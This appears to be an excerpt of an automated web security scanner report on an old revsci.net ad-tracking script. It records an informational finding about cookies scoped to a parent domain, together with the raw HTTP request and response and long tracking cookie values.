/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.70. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/747456476.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4k+hOQIMDTaxq2F29/wEqICTC+braGYRkX0IsTQ0ubO+NO1EqsJ5SuHqPlIcMQ/cyPekhZ3rugfzV/JfmwFGk3Mf/4Y6bYkUU1SZC9gAvyLH44nAucnlFzNXQvOb0+40/8tqbVJiwzk7nGYOEycePb5NH+vhetLHppwKkT+DzHpQx+SwiWGQ8fqSkc+eciUJZOOO/95NLn+u90m99YF9dFiemRsTzrivcBIXPvyJIVyEnVxqat2dbyw4AVwVnd7dqBwWXPb9Vtb5nTbKa609dWsX4bdLx83SHTvYwma88ioXl3LyD2l6Dli1z26tTPqkF/+hATPktdD/dIkKKQ/Wtx+RM2lX57SoOUxM8Qd+jF0dwJi3ezET/tQF0yDTCpdW1oNcV/WRpaFL41ViEct/w9vaaz85Dy7Y7z/LzGzihKy1i74LGRozTRRWS9a+jmUvYtMVj/ZIqv67AcTQp+lNVJYDCXjRjvveqDo24tNu5ytOYLlMKsKUmVnbtPJCbI6HRZ6zxSdeNvVryuiFi+2JaKd3KUrI1J6qdS3CXETsHccFguCNRhp5Q3puU9Qys6K+iIGSBndOiS6ucIBoVS2/BrRMr3P0VjbBYF71Jf46PUnFjLC0ARoLnHUNR1ssPJxDjs7CD3TptS9OKVFyWaPj/h+k/1OWudj9nfK+CDw0Q3q3LVBNa5XyYrXf2ujmqG+We8UwYvTarT+g8g/QPHk8MI8hD+XG/BwGS01ckTs53jJdv4L6y4siLA2S8LOWcs1lyhBy26B82dfsUlqZieTZYPsJJS38KN0R; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
rtc_xTlF=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/747456476.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fprivate-equity%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/private-equity/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="pUMV4ymjOCYULQEE166YFQ6DmFfDqOqv5R0Sep/xDdMQzQnGPlweaJXw308lcxsF58vOxVNcs8R89Us/bQw/0uEcBlgm3HbVBaqZciMXxA7ZQVsQNiAf++dJGYq1/xNl73YlZqAJtiAniZK+6WJ9mDbp1ivhzL5nEis7wXnPalOc+X8R2RVg+y8UNaZy5ZOc+H8kd4SG3Oo03tz7/dw18dKTWdxukwoaubmDFQHTMm4sRKbDfKN48UPoYMTs6BX1A4LF46V440ElFpoeJitf2h/pLwbuK0ljGz39v62Sma+Zo73lcvqhSmbjkU1Q6kZQoclEYeUyfIqfQY3sCsUUa8Sy9z7ZcgnF1atSKLPhTXaf6OoqzQEfeQWe3wpIUGn2GHtXLVGm45mmFmqunA7jZO2aHzuLCTp28NqBu8kCH+xHOE6jb7/4z7ZPkQJ+u/D+sZL25ZZoIAnJ4uU+LqTXIUpslqyUB5oWsUbJLKSoK89sf5wC46cWKHLCUCUx7V+Vn5AoBfDmY0qerCSkq63sxMnKVc7Y2mLTInWjV/ewZU9UjHPMkHGBtTX8t75ArQil/Na2GRTFUr5fhdfgzx5oueUv1FPRvGVMAAqoGtR13qVB/Vg2keSh/FCyLjGc7uE/9s+WRiFezbsVZeCcC+d9Eb880BuvdonWkyFfw1avjO6jM5wSjPV0ATxo8i0yFWFbNJIhhHcqIHXKggZNdINPohBJjEC1kJGLwFSXfTmEkpyH3TofsHIdXiJBg8muA/Jaj3c2fgkIteiYcB2Gz4Wn7j5HgmfS2ecJe+Trq7ITr9gPIZRpsJSIaO3EOUuYIwjyNdvXn8MfyMoxNDKjRes+Q8bR2sJdjoX8lZOkDh5J3PsAg0ikelhbA+xEPpzCrSjQCR2VevyKfKb/K0DBlXBwCdBzJqyGXNGQSDeXGHOCnhhj57KZMNSbLbSuOz5S21Yml1cbecDFyQsykG1JkFEr1ZDlBPWhf0lFBV6XAFRVrJ/a/JXiiBb4Eeg0AJ8vdp9Ilk5Na13QOPb71fp0boUamxNQpFz2NH9rpR1TOzhJz32LBycYZQry+MdshyoyJQ15G5TxeWDaczW4lSsMVYpvvQzqS8vRkGLOgMshXUu2E+a6xgsVGc11kHB8/aLJkwXFkcx4BF0L4s4ICThTh7CcKzozKJmM4LzFXXaINqTogC3wV5sXvBwSQfSVUd9lpwd9bs34Cb1OEjgd7rqkmnwwqP5uXurOGd8EYTeaGuv/qZPb8bTTalHpXy+PkGYZX13lAxeMItepWLPcaLLBpAYBKZ/Ihq1fKdq4TQe38T7YgQh+wnvRH1fjYGJmt5DWwZOw3wbIad2fJZShuZWCNnyIB6KCbPN4G/KTzUNy5kVqO+pBsdZW05zyp5FIuP0vYNGbMBkdNgMWUed6K/hEUdmSGEyP19JTJtDeHAag63fQkEjJ6twXzWTr1I7NaNzc+vCaGz5HPRVZafnlO/ulNenk6eGxbU9msVlICW6Fsoac7neLMtXq3KnjAoQSzlc37GR17Uli9FXO/9DpV+1KMKVSzhTj7dEU13glsLz96Zewco5QSNCjx3VKQ82gqES+uLicq8VrbcQZ8bZUFsiEyYTxlZ+fS6/EYnLjJ9Bk6LAgUDFoLFqGEFdxm9qf31Gqq6yE+3FP0sXUhv9CTG9Qao3c6D69SN73qQ3I+LREv/fxXOnYd5NAs+zwVcmF/PHUAgKmZMsxjhKOlt4kOsS+FetbxfaCgkZcpZ4P36eyny+I4yUu0lDINI8+eBDvAUCY3h2n89Pz1nhuWK7Q534Q7w=="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huHIQJvAtY6gquhqs9vksg7ZjGgbPT28I6QQ4O3XYuv3lSTtqNncA2iFgL+J8wQfFRGQkQ2U54M8TCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadaV+PrsMX5NHgYvwPC5gr3Yt2y4CuwWsFZGNb3+plg+HE3zp9eW9A0fom4BiGY4s/G+Uwj6jX05Gl0Qb4rT+TEQk0Q7B9QZZ+lu3RJU3VgQGczhMSaKNrfE5RhrcghAxB/dxrxrGWn+ryYainQfbfCJmZD3bJn36lB4CEOAKjnX0kOTs+Lp191ypAB+cu3wXMeWrEwZKB8YUlyEeFKlYq/5OiFPisDl4PXAE0tQu5K4VWyy1HLBwdT6omhcJ331LWC9Uks7Kd5n4r0lfGlcBr02DQ1eIBBo4c8qk5J42uboOq7ZTwHJAvACQ+mTcz0WFG5MZkwsEEfn3J0xjGEGhENNzaxN50Qif50PjUrppERBb2Nwi4ozEc1oqpYjzRkOaIfNTifuvL+Y0I0ozl97zf96g92Zm9/56RKf7a0uIiixS8DN0WOgfndLNhl0ROzg23rioxDlWG0ASbzIfhbU/lkr4VVmipZmDTDRXXxu3KZvlT4gQW2jZyzYTrAZOxgc0+JZq3yelan7mv55EGeJu243qIPxrZOcsuxxWMPiRSfgUR1fjP8f5is8zTFImgKS39bFCgfBrspHsPNUsstDTBdeGr6AyfwdAqh7zjwsUAqvnKgZnlTFWZ1hOwhg==; rtc_hiGv=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_hiGv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+hOQIMDTaxq2F29/wEqICTC+braGYRkX0IsTQ0ubO+NO1EqsJ5SuHqPlIcMQ/cyPekhZ3rugfzV/JfmwFGk3Mf/4Y6bYkUU1SZC9gAvyLH44nAucnlFzNXQvOb0+40/8tqbVJiwzk7nGYOEycePb5NH+vhetLHppwKkT+DzHpQx+SwiWGQ8fqSkc+eciUJZOOO/95NLn+u90m99YF9dFiemRsTzrivcBIXPvyJIVyEnVxqat2dbyw4AVwVnd7dqBwWXPb9Vtb5nTbKa609dWsX4bdLx83SHTvYwma88ioXl3LyD2l6Dli1z26tTPqkF/+hATPktdD/dIkKKQ/Wtx+RM2lX57SoOUxM8Qd+jF0dwJi3ezET/tQF0yDTCpdW1oNcV/WRpaFL41ViEct/w9vaaz85Dy7Y7z/LzGzihKy1i74LGRozTRRWS9a+jmUvYtMVj/ZIqv67AcTQp+lNVJYDCXjRjvveqDo24tNu5ytOYLlMKsKUmVnbtPJCbI6HRZ6zxSdeNvVryuiFi+2JaKd3KUrI1J6qdS3CXETsHccFguCNRhp5Q3puU9Qys6K+iIGSBndOiS6ucIBoVS2/BrRMr3P0VjbBYF71Jf46PUnFjLC0ARoLnHUNR1ssPJxDjs7CD3TptS9OKVFyWaPj/h+k/1OWudj9nfK+CDw0Q3q3LVBNa5XyYrXf2ujmqG+We8UwYvTarT+g8g/QPHk8MI8hD+XG/BwGS01ckTs53jJdv4L6y4siLA2S8LOWcs1lyhBy26B82dfsUlqZieTZYPsJJS38KN0R; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
Set-Cookie: rtc_xTlF=MLvv+TMxZohq566eiyy8UbOz7zLy9mEQ8mXXGp+M0638wei+ulFK2S4Ev1MTpaDGwTDIzNSh73JhXWRrYe1q8VFI58tTtWhCdbI4MzA3YYxxXubjq8FSgOMmMG9sH0gUiVnOQ65fXoi3mopY7JL9/gppSNiBtjY1I+h5ZnQDjeIrP2A07R9E4B0/DoWFrvtn5GQlDn/QR3osWe5Qq5jlHKHXjt9aTgNU+htJJCoHZr0vwt5BgumbXpb6EsGpW168HIMJDNaMDk/AHu8AoumgsHIc49RABGlc5sPzY78IAfLZevbFOT9enhBT5iTPx8uhKb6ICuiU1KndCPNBUzRwqFiGUErzYHBI82KY2aAuTGaePJI6sJZsbp1aH1n8gQdTnWO2HiRS2vf7NHPlTlumMDGb5I1n3eQhJau8lvMC65dkcxS+qzPNuXXZtiKSp8AqpfiC4j5H5Gs6I/wJePaMa/H/bKye2StM1J3uRbUuh7Qjix0Q65p+KrO58APdAnkl2ykfxv7Q6Mkh8c0ZSg3OReCY3/iHqvWzwk2TUfctz3UnQ5fZRbtqqIDTl2A6A5OeQimMEhDTu1P5EcdcGutHW7DsiuBV2NQ6toA6l/cx84UbT7CfxCUTprpW02CfMnxd/M/YgPxK3F1+ahsMNGWsBVgWHYi9ELphviFiySqgZY8OVxLe5ON/NN3zM5GGddLiBiAXJn6Iyk8XVV6YLYZ/CgWVWvEJHiiX521RyrH3mhvARcvb943dl10QuzcIIoHN2/tBinpTl/y99V44Vs31Ci0yLc+8HOcgDUbaDUlToDT6shAnbwRMyvTJoN47EaH+qn